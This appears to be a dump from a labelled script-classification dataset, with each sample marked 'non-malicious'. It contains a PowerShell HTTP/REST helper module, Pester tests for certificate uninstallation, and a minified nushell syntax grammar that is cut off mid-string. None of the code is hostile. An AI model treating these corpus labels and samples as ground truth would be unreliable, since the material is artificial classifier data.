## 1.0.2 Fix for Invoke-Http not passing credentials correctly
####################################################################################################
## Usage:
## function Get-Google {
## Invoke-Http GET http`://www.google.com/search @{q=$args} |
## Receive-Http Xml "//h3[@class='r']/a" | Select href, InnerText
## }
## #########################################################################
## function Get-WebFile($url,$cred) {
## Invoke-Http GET $url -auth $cred | Receive-Http File
## }
## #########################################################################
## function Send-Paste {
## PARAM($PastebinURI="http`://posh.jaykul.com/p/",[IO.FileInfo]$file)
## PROCESS {
## if($_){[IO.FileInfo]$file=$_}
##
## if($file.Exists) {
## $ofs="`n"
## $result = Invoke-Http POST $PastebinURI @{
## format="posh" # PowerShell
## expiry="d" # (d)ay or (m)onth or (f)orever
## poster=$([Security.Principal.WindowsIdentity]::GetCurrent().Name.Split("\\")[-1])
## code2="$((gc $file) -replace "http`://","http``://")" # To get past the spam filter.
## paste="Send"
## } -Type FORM_URLENCODED -Wait
## $xml = $result.AsDocument().ToXml()
## write-output $xml.SelectSingleNode("//*[@class='highlight']/*").href
## } else { throw "File Not Found" }
## }}
##
####################################################################################################
if(!$PSScriptRoot){
Write-Debug $($MyInvocation.MyCommand | out-string)
$PSScriptRoot=(Split-Path $MyInvocation.MyCommand.Path -Parent)
}
# Write-Debug "Invocation: $($MyInvocation.MyCommand.Path)"
# Write-Debug "Invocation: $($MyInvocation.MyCommand)"
# Write-Debug "Invocation: $($MyInvocation)"
Write-Debug "PSScriptRoot: '$PSScriptRoot'"
# This Module depends on MindTouch.Dream
$null = [Reflection.Assembly]::LoadFrom( "$PSScriptRoot\\mindtouch.dream.dll" )
# MindTouch.Dream requires: mindtouch.dream.dll, mindtouch.core.dll, SgmlReaderDll.dll, and log4net.dll)
# This Module also depends on utility functions from System.Web
$null = [Reflection.Assembly]::LoadWithPartialName("System.Web")
## Some utility functions are defined at the bottom
[uri]$global:url = ""
[System.Management.Automation.PSCredential]$global:HttpRestCredential = $null
function Get-DreamMessage($Content,$Type) {
if(!$Content) {
return [MindTouch.Dream.DreamMessage]::Ok()
}
if( $Content -is [System.Xml.XmlDocument]) {
return [MindTouch.Dream.DreamMessage]::Ok( $Content )
}
if(Test-Path $Content -EA "SilentlyContinue") {
return [MindTouch.Dream.DreamMessage]::FromFile((Convert-Path (Resolve-Path $Content)));
}
if($Type -is [String]) {
$Type = [MindTouch.Dream.MimeType]::$Type
}
if($Type -is [MindTouch.Dream.DreamMessage]) {
return [MindTouch.Dream.DreamMessage]::Ok( $Type, $Content )
} else {
return [MindTouch.Dream.DreamMessage]::Ok( $([MindTouch.Dream.MimeType]::TEXT), $Content )
}
}
function Get-DreamPlug {
PARAM ( $Url, [hashtable]$With )
if($Url -is [array]) {
if($Url[0] -is [hashtable]) {
$plug = [MindTouch.Dream.Plug]::New($global:url)
foreach($param in $url.GetEnumerator()) {
if($param.Value) {
$plug = $plug.At($param.Key,"=$(Encode-Twice $param.Value)")
} else {
$plug = $plug.At($param.Key)
}
}
}
else
{
[URI]$uri = Join-Url $global:url $url
$plug = [MindTouch.Dream.Plug]::New($uri)
}
}
elseif($url -is [string])
{
[URI]$uri = $url
if(!$uri.IsAbsoluteUri) {
$uri = Join-Url $global:url $url
}
$plug = [MindTouch.Dream.Plug]::New($uri)
}
else {
$plug = [MindTouch.Dream.Plug]::New($global:url)
}
if($with) {
foreach($param in $with.GetEnumerator()) {
if($param.Value) {
$plug = $plug.With($param.Key,$param.Value)
}
}
}
return $plug
}
#CMDLET Receive-Http {
Function Receive-Http {
PARAM(
# [Parameter(Position=1, Mandatory=$false)]
# [ValidateSet("Xml", "File", "Text","Bytes")]
# [Alias("As")]
$Output = "Xml"
,
# [Parameter(Position=2, Mandatory=$false)]
[string]$Path
,
# [Parameter(Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Result")]
# [Alias("IO")]
# [MindTouch.Dream.Result``1[[MindTouch.Dream.DreamMessage]]]
$InputObject
#,
# [Parameter(Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Response")]
# [MindTouch.Dream.DreamMessage]
# $response
)
BEGIN {
if($InputObject) {
Write-Output $inputObject | Receive-Http $Output $Path
} # else they'd better pass it in on the pipeline ...
}
PROCESS {
$response = $null
if($_ -is [MindTouch.Dream.Result``1[[MindTouch.Dream.DreamMessage]]]) {
$response = $_.Wait()
} elseif($_ -is [MindTouch.Dream.DreamMessage]) {
$response = $_
} elseif($_) {
throw "We can only pipeline [MindTouch.Dream.DreamMessage] objects, or [MindTouch.Dream.Result`1[DreamMessage]] objects"
}
if($response) {
Write-Debug $($response | Out-String)
if(!$response.IsSuccessful) {
Write-Error $($response | Out-String)
Write-Verbose $response.AsText()
throw "ERROR: '$($response.Status)' Response Status."
} else {
switch($Output) {
"File" {
## Joel's magic filename guesser ...
if(!$Path) {
[string]$fileName = ([regex]'(?i)filename=(.*)$').Match( $response.Headers["Content-Disposition"] ).Groups[1].Value
$Path = $fileName.trim("\\/""'")
if(!$Path) {
$fileName = $response.ResponseUri.Segments[-1]
$Path = $fileName.trim("\\/")
if(!([IO.FileInfo]$Path).Extension) {
$Path = $Path + "." + $response.ContentType.Split(";")[0].Split("/")[1]
}
}
}
$File = Get-FileName $Path
[StreamUtil]::CopyToFile( $response.AsStream(), $response.ContentLength, $File )
Get-ChildItem $File
}
"XDoc" {
if($Path) {
$response.AsDocument()[$Path]
} else {
$response.AsDocument()#.ToXml()
}
}
"Xml" {
if($Path) {
$response.AsDocument().ToXml().SelectNodes($Path)
} else {
$response.AsDocument().ToXml()
}
}
"Text" {
if($Path) {
$response.AsDocument()[$Path] | % { $_.AsText }
} else {
$response.AsText()
}
}
"Bytes" {
$response.AsBytes()
}
}
}
}
}
}
## http`://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
## Nobody actually uses HEAD or OPTIONS, right?
## And nobody's even heard of TRACE or CONNECT ;)
# CMDLET Invoke-Http {
Function Invoke-Http {
PARAM(
# [Parameter(Position=0, Mandatory=$false)]
# [ValidateSet("Post", "Get", "Put", "Delete", "Head", "Options")] ## There are other verbs, but we need a list to make sure you don't screw up
[string]$Verb = "Get"
,
# [Parameter(Position=1, Mandatory=$false, ValueFromPipeline=$true)]
# [string]
$Path
,
# [Parameter(Position=2, Mandatory=$false)]
[hashtable]$with
,
# [Parameter(Position=3, Mandatory=$false)]
$Content
,
$Type # Of Content
,
$authenticate
,
[switch]$waitForResponse
)
BEGIN {
$Verbs = "Post", "Get", "Put", "Delete", "Head", "Options"
if($Verbs -notcontains $Verb) {
Write-Warning "The specified verb '$Verb' is NOT one of the common verbs: $Verbs"
}
if($Path) {
if($Content) {
Write-Output ($Path | Invoke-Http $Verb -With $With -Content $Content -Type $Type -Authenticate $authenticate -waitForResponse:$WaitForResponse)
} else {
Write-Output ($Path | Invoke-Http $Verb -With $With -Type $Type-Authenticate $authenticate -waitForResponse:$WaitForResponse)
}
} # else they'd better pass it in on the pipeline ...
}
PROCESS {
if($_) {
$Path = $_
$plug = Get-DreamPlug $Path $With
Write-Verbose "Content Type: $Type"
Write-Verbose "Content: $Content"
## Special Handling for FORM_URLENCODED
if($Type -like "Form*" -and !$Content) {
$dream = [MindTouch.Dream.DreamMessage]::Ok( $Plug.Uri )
$Plug = [MindTouch.Dream.Plug]::New( $Plug.Uri.SchemeHostPortPath )
Write-Verbose "RECREATED Plug: $($Plug.Uri.SchemeHostPortPath)"
} else {
$dream = Get-DreamMessage $Content $Type
}
if(!$plug -or !$dream) {
throw "Can't come up with a request!"
}
Write-Verbose $( $dream | Out-String )
if($authenticate){
Write-Verbose "AUTHENTICATE AS $($authenticate.UserName)"
if($authenticate -is [System.Management.Automation.PSCredential]) {
Write-Verbose "AUTHENTICATING AS $($authenticate.UserName)"
$plug = $plug.WithCredentials($authenticate.GetNetworkCredential())
} elseif($authenticate -is [System.Net.NetworkCredential]) {
Write-Verbose "AUTHENTICATING AS $($authenticate.UserName)"
$plug = $plug.WithCredentials($authenticate)
} else {
$null = Get-HttpCredential
Write-Verbose "AUTHENTICATING AS $($global:HttpRestCredential.UserName)"
$plug = $plug.WithCredentials($global:HttpRestCredential.GetNetworkCredential())
}
}
Write-Verbose $plug.Uri
## DEBUG:
Write-Debug "URI: $($Plug.Uri)"
Write-Debug "Verb: $($Verb.ToUpper())"
Write-Debug $($dream | Out-String)
$result = $plug.InvokeAsync( $Verb.ToUpper(), $dream )
Write-Debug $($result | Out-String)
# if($DebugPreference -eq "Continue") {
# Write-Debug $($result.Wait() | Out-String)
# }
if($waitForResponse) {
$result = $result.Wait()
}
write-output $result
trap [MindTouch.Dream.DreamResponseException] {
Write-Error @"
TRAPPED DreamResponseException
$($_.Exception.Response | Out-String)
$($_.Exception.Response.Headers | Out-String)
"@
break;
}
}
}
}
function Get-WebPageContent {
#[CmdletBinding()]
param(
# [Parameter(Position=0,Mandatory=$true)]
[string]$url
,
# [Parameter(Position=1,Mandatory=$false)]
[string]$xpath=""
,
# [Parameter(Mandatory=$false)]
[hashtable]$with=@{}
,
# [Parameter(Position=2,Mandatory=$false)]
[switch]$AsXml
)
BEGIN { $out = "Text"; if($AsXml) { $out="Xml" } }
PROCESS {
invoke-http get $url $with | receive-http $out $xpath
}
}
new-alias gwpc Get-WebPageContent -EA "SilentlyContinue"
new-alias http Invoke-Http -EA "SilentlyContinue"
new-alias rcv Receive-Http -EA "SilentlyContinue"
# function Get-Http { return Invoke-Http "GET" @args }
# function New-Http { return Invoke-Http "PUT" @args }
# function Update-Http { return Invoke-Http "POST" @args }
# function Remove-Http { return Invoke-Http "DELETE" @args }
# new-alias Set-Http Update-Http
# new-alias Put-Http New-Http
# new-alias Post-Http Update-Http
# new-alias Delete-Http Remove-Http
function Set-HttpDefaultUrl {
PARAM ([uri]$baseUri=$(Read-Host "Please enter the base Uri for your RESTful web-service"))
$global:url = $baseUri
}
function Set-HttpCredential {
param($Credential=$(Get-CredentialBetter -Title "Http Authentication Request - $($global:url.Host)" `
-Message "Your login for $($global:url.Host)" `
-Domain $($global:url.Host)) )
if($Credential -is [System.Management.Automation.PSCredential]) {
$global:HttpRestCredential = $Credential
} elseif($Credential -is [System.Net.NetworkCredential]) {
$global:HttpRestCredential = new-object System.Management.Automation.PSCredential $Credential.UserName, $(ConvertTo-SecureString $credential.Password)
}
}
function Get-HttpCredential([switch]$Secure) {
if(!$global:url) { Set-HttpDefaultUrl }
if(!$global:HttpRestCredential) { Set-HttpCredential }
if(!$Secure) {
return $global:HttpRestCredential.GetNetworkCredential();
} else {
return $global:HttpRestCredential
}
}
# function Authenticate-Http {
# PARAM($URL=@("users","authenticate"), $Credential = $(Get-HttpCredential))
# $plug = [MindTouch.Dream.Plug]::New( $global:url )
# $null = $plug.At("users", "authenticate").WithCredentials( $auth.UserName, $auth.Password ).Get()
# }
function Encode-Twice {
param([string]$text)
return [System.Web.HttpUtility]::UrlEncode( [System.Web.HttpUtility]::UrlEncode( $text ) )
}
function Join-Url ( [uri]$baseUri=$global:url ) {
$ofs="/";$BaseUrl = ""
if($BaseUri -and $baseUri.AbsoluteUri) {
$BaseUrl = "$($baseUri.AbsoluteUri.Trim('/'))/"
}
return [URI]"$BaseUrl$([string]::join("/",@($args)).TrimStart('/'))"
}
function ConvertTo-SecureString {
Param([string]$input)
$result = new-object System.Security.SecureString
foreach($c in $input.ToCharArray()) {
$result.AppendChar($c)
}
$result.MakeReadOnly()
return $result
}
## Unit-Test Get-FileName ## Should return TRUE
## (Get-FileName C:\\Windows\\System32\\Notepad.exe) -eq "C:\\Windows\\System32\\Notepad.exe" -and
## (Get-FileName C:\\Windows\\Notepad.exe C:\\Windows\\System32\\) -eq "C:\\Windows\\System32\\Notepad.exe" -and
## (Get-FileName WaitFor.exe C:\\Windows\\System32\\WaitForIt.exe) -eq "C:\\Windows\\System32\\WaitForIt.exe" -and
## (Get-FileName -Path C:\\Windows\\System32\\WaitForIt.exe) -eq "C:\\Windows\\System32\\WaitForIt.exe"
function Get-FileName {
param($fileName=$([IO.Path]::GetRandomFileName()), $path)
$fileName = $fileName.trim("\\/""'")
## if the $Path has a file name, and it's folder exists:
if($Path -and !(Test-Path $Path -Type Container) -and (Test-Path (Split-Path $path) -Type Container)) {
$path
## if the $Path is just a folder (and it exists)
} elseif($Path -and (Test-Path $path -Type Container)) {
$fileName = Split-Path $fileName -leaf
Join-Path $path $fileName
## If there's no valid $Path, and the $FileName has a folder...
} elseif((Split-Path $fileName) -and (Test-Path (Split-Path $fileName))) {
$fileName
} else {
Join-Path (Get-Location -PSProvider "FileSystem") (Split-Path $fileName -Leaf)
}
}
function Get-UtcTime {
Param($Format="yyyyMMddhhmmss")
[DateTime]::Now.ToUniversalTime().ToString($Format)
}
## Get-CredentialBetter
## An improvement over the default cmdlet which has no options ...
###################################################################################################
## History
## v 1.2 Refactor ShellIds key out to a variable, and wrap lines a bit
## v 1.1 Add -Console switch and set registry values accordingly (ouch)
## v 1.0 Add Title, Message, Domain, and UserName options to the Get-Credential cmdlet
###################################################################################################
function Get-CredentialBetter{
PARAM([string]$UserName, [string]$Title, [string]$Message, [string]$Domain, [switch]$Console)
$ShellIdKey = "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds"
## Carefully EA=SilentlyContinue because by default it's MISSING, not $False
$cp = (Get-ItemProperty $ShellIdKey ConsolePrompting -ea "SilentlyContinue")
## Compare to $True, because by default it's $null ...
$cp = $cp.ConsolePrompting -eq $True
if($Console -and !$cp) {
Set-ItemProperty $ShellIdKey ConsolePrompting $True
} elseif(!$Console -and $Console.IsPresent -and $cp) {
Set-ItemProperty $ShellIdKey ConsolePrompting $False
}
## Now call the Host.UI method ... if they don't have one, we'll die, yay.
$Host.UI.PromptForCredential($Title,$Message,$UserName,$Domain,"Generic","Default")
## BoyScouts: Leave everything better than you found it (I'm tempted to leave it = True)
Set-ItemProperty $ShellIdKey ConsolePrompting $cp
}
|
combined_dataset/train/non-malicious/1071.ps1
|
1071.ps1
|
Set-StrictMode -Version 'Latest'
$TestCertPath = Join-Path -Path $PSScriptRoot -ChildPath 'Certificates\CarbonTestCertificate.cer' -Resolve
$TestCert = New-Object Security.Cryptography.X509Certificates.X509Certificate2 $TestCertPath
& (Join-Path -Path $PSScriptRoot -ChildPath 'Initialize-CarbonTest.ps1' -Resolve)
Describe 'Uninstall-Certificate' {
BeforeEach {
if( -not (Test-Path Cert:\CurrentUser\My\$TestCert.Thumbprint -PathType Leaf) )
{
Install-Certificate -Path $TestCertPath -StoreLocation CurrentUser -StoreName My
}
}
It 'should remove certificate by certificate' {
Uninstall-Certificate -Certificate $TestCert -StoreLocation CurrentUser -StoreName My
$cert = Get-Certificate -Thumbprint $TestCert.Thumbprint -StoreLocation CurrentUser -StoreName My
$cert | Should BeNullOrEmpty
}
It 'should remove certificate by thumbprint' {
Uninstall-Certificate -Thumbprint $TestCert.Thumbprint -StoreLocation CurrentUser -StoreName My
$maxTries = 10
$tryNum = 0
do
{
$cert = Get-Certificate -Thumbprint $TestCert.Thumbprint -StoreLocation CurrentUser -StoreName My
if( -not $cert )
{
break
}
Start-Sleep -Milliseconds 100
}
while( $tryNum++ -lt $maxTries )
$cert | Should BeNullOrEmpty
}
It 'should support WhatIf' {
Uninstall-Certificate -Thumbprint $TestCert.Thumbprint -StoreLocation CurrentUser -StoreName My -WhatIf
$cert = Get-Certificate -Thumbprint $TestCert.Thumbprint -StoreLocation CurrentUser -StoreName My
$cert | Should Not BeNullOrEmpty
}
It 'should uninstall certificate from custom store' {
$cert = Install-Certificate -Path $TestCertPath -StoreLocation CurrentUser -CustomStoreName 'Carbon'
$cert | Should Not BeNullOrEmpty
$certPath = 'Cert:\CurrentUser\Carbon\{0}' -f $cert.Thumbprint
$certPath | Should Exist
Uninstall-Certificate -Thumbprint $cert.Thumbprint -StoreLocation CurrentUser -CustomStoreName 'Carbon' -Verbose
while( (Test-Path -Path $certPath) )
{
Write-Verbose -Message ('Waiting for "{0}" to get deleted.' -f $certPath)
Start-Sleep -Seconds 1
}
$certPath | Should Not Exist
}
It 'should uninstall certificate from remote computer' -Skip:(Test-Path -Path 'env:APPVEYOR') {
$Global:Error.Clear()
$session = New-PSSession -ComputerName $env:COMPUTERNAME
try
{
Uninstall-Certificate -Thumbprint $TestCert.Thumbprint `
-StoreLocation CurrentUser `
-StoreName My `
-Session $session
$Global:Error.Count | Should Be 0
$cert = Get-Certificate -Thumbprint $TestCert.Thumbprint -StoreLocation CurrentUser -StoreName My
$cert | Should BeNullOrEmpty
}
finally
{
Remove-PSSession -Session $session
}
}
}
function GivenARemotingSession
{
$script:session = New-PSSession -ComputerName $env:COMPUTERNAME
}
function GivenAnInstalledCertificate
{
param(
$StoreLocation = 'CurrentUser',
$StoreName = 'My'
)
Install-Certificate -Path $TestCertPath -StoreLocation $StoreLocation -StoreName $StoreName
}
function WhenPipedMultipleThumbprints
{
$TestCert.Thumbprint,$TestCert.Thumbprint | Uninstall-Certificate
}
function WhenUninstallingViaRemoting
{
try
{
$TestCert | Uninstall-Certificate -Session $session
}
finally
{
$session | Remove-PSSession
}
}
function WhenUninstallPipedCertificate
{
$TestCert | Uninstall-Certificate
}
function WhenUninstallingByThumbprint
{
Uninstall-Certificate -Thumbprint $TestCert.Thumbprint
}
function WhenUninstallPipedThumbprint
{
$TestCert.Thumbprint | Uninstall-Certificate
}
function ThenCertificateUninstalled
{
It 'should uninstall the certificate' {
Join-Path -Path 'cert:\*\*' -ChildPath $TestCert.Thumbprint | Should Not Exist
}
}
Describe 'Uninstall-Certificate.when given just the certificate thumbprint' {
GivenAnInstalledCertificate
WhenUninstallingByThumbprint
ThenCertificateUninstalled
}
Describe 'Uninstall-Certificate.when given just the certificate thumbprint and installed in multiple stores' {
GivenAnInstalledCertificate
GivenAnInstalledCertificate -StoreLocation 'CurrentUser' -StoreName 'My'
GivenAnInstalledCertificate -StoreLocation 'LocalMachine' -StoreName 'My'
GivenAnInstalledCertificate -StoreLocation 'LocalMachine' -StoreName 'Root'
WhenUninstallingByThumbprint
ThenCertificateUninstalled
}
Describe 'Uninstall-Certificate.when piped thumbprint' {
GivenAnInstalledCertificate
WhenUninstallPipedThumbprint
ThenCertificateUninstalled
}
Describe 'Uninstall-Certificate.when piped certificate object' {
GivenAnInstalledCertificate
WhenUninstallPipedCertificate
ThenCertificateUninstalled
}
Describe 'Uninstall-Certificate.when piped multiple thumbprints' {
GivenAnInstalledCertificate
WhenPipedMultipleThumbprints
ThenCertificateUninstalled
}
Describe 'Uninstall-Certificate.when local machine cert shows up in current user store' {
GivenAnInstalledCertificate
Mock -CommandName 'Get-ChildItem' -ModuleName 'Carbon' -ParameterFilter { $Path.Count -eq 2 -and $Path[0] -eq 'Cert:\LocalMachine' -and $Path[1] -eq 'Cert:\CurrentUser' }
WhenUninstallingByThumbprint
It 'should get certificates from LocalMachine stores first' {
Assert-MockCalled -CommandName 'Get-ChildItem' -ModuleName 'Carbon' -Times 1
}
}
|
combined_dataset/train/non-malicious/sample_59_62.ps1
|
sample_59_62.ps1
|
const e=Object.freeze({displayName:"nushell",name:"nushell",patterns:[{include:"#define-variable"},{include:"#define-alias"},{include:"#function"},{include:"#extern"},{include:"#module"},{include:"#use-module"},{include:"#expression"},{include:"#comment"}],repository:{binary:{begin:"\\b(0x)(\\[)",beginCaptures:{1:{name:"constant.numeric.nushell"},2:{name:"meta.brace.square.begin.nushell"}},end:"\\]",endCaptures:{0:{name:"meta.brace.square.begin.nushell"}},name:"constant.binary.nushell",patterns:[{match:"[0-9a-fA-F]{2}",name:"constant.numeric.nushell"}]},"braced-expression":{begin:"\\{",beginCaptures:{0:{name:"punctuation.section.block.begin.bracket.curly.nushell"}},end:"\\}",endCaptures:{0:{name:"punctuation.section.block.end.bracket.curly.nushell"}},name:"meta.expression.braced.nushell",patterns:[{begin:"(?<=\\{)\\s*\\|",end:"\\|",name:"meta.closure.parameters.nushell",patterns:[{include:"#function-parameter"}]},{captures:{1:{name:"variable.other.nushell"},2:{name:"keyword.control.nushell"}},match:"(\\w+)\\s*(:)\\s*"},{captures:{1:{name:"variable.other.nushell"},2:{name:"variable.other.nushell",patterns:[{include:"#paren-expression"}]},3:{name:"keyword.control.nushell"}},match:'(\\$"((?:[^"\\\\]|\\\\.)*)")\\s*(:)\\s*',name:"meta.record-entry.nushell"},{captures:{1:{name:"variable.other.nushell"},2:{name:"keyword.control.nushell"}},match:'("(?:[^"\\\\]|\\\\.)*")\\s*(:)\\s*',name:"meta.record-entry.nushell"},{captures:{1:{name:"variable.other.nushell"},2:{name:"variable.other.nushell",patterns:[{include:"#paren-expression"}]},3:{name:"keyword.control.nushell"}},match:"(\\$'([^']*)')\\s*(:)\\s*",name:"meta.record-entry.nushell"},{captures:{1:{name:"variable.other.nushell"},2:{name:"keyword.control.nushell"}},match:"('[^']*')\\s*(:)\\s*",name:"meta.record-entry.nushell"},{include:"#spread"},{include:"source.nushell"}]},command:{begin:`(?<!\\w)(?:(\\^)|(?![0-9]|\\$))([\\w.!]+(?:(?: (?!-)[\\w\\-.!]+(?:(?= |\\))|$)|[\\w\\-.!]+))*|(?<=\\^)\\$?(?:"[^"]+"|'[^']+'))`,beginCaptures:{1:{name:"keyword.operator.nushell"},2:{patterns:[{include:"#control-keywords"},{captures:{0:{name:"keyword.other.builtin.nushell"}},match:"(?:ansi|char) \\w+"},{captures:{1:{name:"keyword.other.builtin.nushell"},2:{patterns:[{include:"#value"}]}},comment:"Regex generated with list-to-tree (https://github.com/glcraft/list-to-tree)",match:"(a(?:ll|n(?:si(?: (?:gradient|link|strip))?|y)|ppend|st)|b(?:its(?: (?:and|not|or|ro(?:l|r)|sh(?:l|r)|xor))?|reak|ytes(?: (?:a(?:dd|t)|build|collect|ends-with|index-of|length|re(?:move|place|verse)|starts-with))?)|c(?:al|d|har|lear|o(?:l(?:lect|umns)|m(?:mandline|p(?:act|lete))|n(?:fig(?: (?:env|nu|reset))?|tinue))|p)|d(?:ate(?: (?:format|humanize|list-timezone|now|to-(?:record|t(?:able|imezone))))?|e(?:bug|code(?: (?:base64|hex))?|fault|scribe|tect columns)|fr (?:a(?:gg(?:-groups)?|ll-(?:false|true)|ppend|rg-(?:m(?:ax|in)|sort|true|unique|where)|s(?:-date(?:time)?)?)|c(?:ache|o(?:l(?:lect|umns)?|n(?:cat(?:-str|enate)|tains)|unt(?:-null)?)|umulative)|d(?:atepart|rop(?:-(?:duplicates|nulls))?|types|ummies)|exp(?:lode|r-not)|f(?:etch|i(?:l(?:l-n(?:an|ull)|ter(?:-with)?)|rst)|latten)|g(?:et(?:-(?:day|hour|m(?:inute|onth)|nanosecond|ordinal|second|week(?:day)?|year))?|roup-by)|i(?:mplode|nto-(?:df|lazy|nu)|s-(?:duplicated|in|n(?:ot-null|ull)|unique))|join|l(?:ast|it|owercase|s)|m(?:ax|e(?:an|dian|lt)|in)|n(?:-unique|ot)|o(?:pen|therwise)|qu(?:antile|ery)|r(?:e(?:name|place(?:-all)?|verse)|olling)|s(?:ample|e(?:lect|t(?:-with-idx)?)|h(?:ape|ift)|lice|ort-by|t(?:d|r(?:-(?:lengths|slice)|ftime))|um(?:mary)?)|t(?:ake|o-(?:a(?:rrow|vro)|csv|jsonl|parquet))|u(?:nique|ppercase)|va(?:lue-counts|r)|w(?:hen|ith-column))|o|rop(?: (?:column|nth))?|u)|e(?:ach(?: while)?|cho|n(?:code(?: (?:base64|hex))?|umerate)|rror make|very|x(?:ec|it|p(?:l(?:ain|ore)|ort-env)))|f(?:i(?:l(?:l|ter)|nd|rst)|latten|mt|ormat(?: (?:d(?:ate|uration)|filesize))?|rom(?: (?:csv|json|nuon|ods|ssv|t(?:oml|sv)|url|x(?:lsx|ml)|y(?:aml|ml)))?)|g(?:et|lob|r(?:id|oup(?:-by)?))|h(?:ash(?: (?:md5|sha256))?|e(?:aders|lp(?: (?:aliases|commands|externs|modules|operators))?)|i(?:de-env|sto(?:gram|ry(?: session)?))|ttp(?: (?:delete|get|head|options|p(?:atch|ost|ut)))?)|i(?:f|gnore|n(?:put(?: list(?:en)?)?|s(?:ert|pect)|to(?: (?:b(?:i(?:nary|ts)|ool)|d(?:atetime|ecimal|uration)|f(?:ilesize|loat)|int|record|s(?:qlite|tring)))?)|s-(?:admin|empty)|tems)|join|k(?:eybindings(?: (?:default|list(?:en)?))?|ill)|l(?:a(?:st|zy make)|e(?:ngth|t-env)|ines|o(?:ad-env|op)|s)|m(?:at(?:ch|h(?: (?:a(?:bs|rc(?:cos(?:h)?|sin(?:h)?|tan(?:h)?)|vg)|c(?:eil|os(?:h)?)|exp|floor|l(?:n|og)|m(?:ax|edian|in|ode)|product|round|s(?:in(?:h)?|qrt|tddev|um)|tan(?:h)?|variance))?)|e(?:rge|tadata)|kdir|ove|v)|nu-(?:check|highlight)|o(?:pen|verlay list)|p(?:a(?:r(?:-each|se)|th(?: (?:basename|dirname|ex(?:ists|pand)|join|parse|relative-to|split|type))?)|ort|r(?:epend|int|ofile)|s)|query db|r(?:an(?:dom(?: (?:bool|chars|d(?:ecimal|ice)|float|integer|uuid))?|ge)|e(?:duce|ject|name|verse)|m|o(?:ll(?: (?:down|left|right|up))?|tate)|un-external)|s(?:ave|c(?:hema|ope (?:aliases|commands|e(?:ngine-stats|xterns)|modules|variables))|e(?:lect|q(?: (?:char|date))?)|huffle|ize|kip(?: (?:until|while))?|leep|o(?:rt(?:-by)?|urce-env)|plit(?: (?:c(?:hars|olumn)|list|row|words)|-by)?|t(?:art|r(?: (?:c(?:a(?:mel-case|pitalize)|ontains)|d(?:istance|owncase)|e(?:nds-with|xpand)|index-of|join|kebab-case|length|pascal-case|re(?:place|verse)|s(?:creaming-snake-case|nake-case|tarts-with|ubstring)|t(?:itle-case|rim)|upcase))?)|ys)|t(?:a(?:ble|ke(?: (?:until|while))?)|erm size|imeit|o(?: (?:csv|html|json|md|nuon|t(?:ext|oml|sv)|xml|yaml)|uch)?|r(?:anspose|y)|utor)|u(?:cp|niq(?:-by)?|p(?:date(?: cells)?|sert)|rl(?: (?:build-query|encode|join|parse))?)|v(?:alues|ersion|iew(?: (?:files|s(?:ource|pan)))?)|w(?:atch|h(?:ere|i(?:ch|le))|i(?:ndow|th-env)|rap)|zip)(?![\\w-])( (.*))?"},{captures:{1:{patterns:[{include:"#paren-expression"}]}},match:`(?<=\\^)(?:\\$("[^"]+"|'[^']+')|"[^"]+"|'[^']+')`,name:"entity.name.type.external.nushell"},{captures:{1:{name:"entity.name.type.external.nushell"},2:{patterns:[{include:"#value"}]}},match:"([\\w.]+(?:-[\\w.!]+)*)(?: (.*))?"},{include:"#value"}]}},end:"(?=\\||\\)|\\}|;)|$",name:"meta.command.nushell",patterns:[{include:"#parameters"},{include:"#spread"},{include:"#value"}]},comment:{match:"(#.*)$",name:"comment.nushell"},"constant-keywords":{match:"\\b(?:true|false|null)\\b",name:"constant.language.nushell"},"constant-value":{patterns:[{include:"#constant-keywords"},{include:"#datetime"},{include:"#numbers"},{include:"#numbers-hexa"},{include:"#binary"}]},"control-keywords":{comment:"Regex generated with list-to-tree (https://github.com/glcraft/list-to-tree)",match:"(?<![0-9a-zA-Z_\\-.\\/:\\\\])(?:break|continue|else(?: if)?|for|if|loop|mut|return|try|while)(?![0-9a-zA-Z_\\-.\\/:\\\\])",name:"keyword.control.nushell"},datetime:{match:"\\b\\d{4}-\\d{2}-\\d{2}(?:T\\d{2}:\\d{2}:\\d{2}(?:\\.\\d+)?(?:\\+\\d{2}:?\\d{2}|Z)?)?\\b",name:"constant.numeric.nushell"},"define-alias":{captures:{1:{name:"entity.name.function.nushell"},2:{name:"entity.name.type.nushell"},3:{patterns:[{include:"#operators"}]}},match:"((?:export )?alias)\\s+([\\w\\-!]+)\\s*(=)"},"define-variable":{captures:{1:{name:"keyword.other.nushell"},2:{name:"variable.other.nushell"},3:{patterns:[{include:"#operators"}]}},match:"(let|mut|(?:export\\s+)?const)\\s+(\\w+)\\s+(=)"},expression:{patterns:[{include:"#pre-command"},{include:"#for-loop"},{include:"#operators"},{match:"\\|",name:"keyword.control.nushell"},{include:"#control-keywords"},{include:"#constant-value"},{include:"#command"},{include:"#value"}]},extern:{begin:'((?:export\\s+)?extern)\\s+([\\w\\-]+|"[\\w\\- ]+")',beginCaptures:{1:{name:"entity.name.function.nushell"},2:{name:"entity.name.type.nushell"}},end:"(?<=\\])",endCaptures:{0:{name:"punctuation.definition.function.end.nushell"}},patterns:[{include:"#function-parameters"}]},"for-loop":{begin:"(for)\\s+(\\$?\\w+)\\s+(in)\\s+(.+)\\s*(\\{)",beginCaptures:{1:{name:"keyword.other.nushell"},2:{name:"variable.other.nushell"},3:{name:"keyword.other.nushell"},4:{patterns:[{include:"#value"}]},5:{name:"punctuation.section.block.begin.bracket.curly.nushell"}},end:"\\}",endCaptures:{0:{name:"punctuation.section.block.end.bracket.curly.nushell"}},name:"meta.for-loop.nushell",patterns:[{include:"source.nushell"}]},function:{begin:'((?:export\\s+)?def(?:\\s+--\\w+)?)\\s+([\\w\\-]+|"[\\w\\- 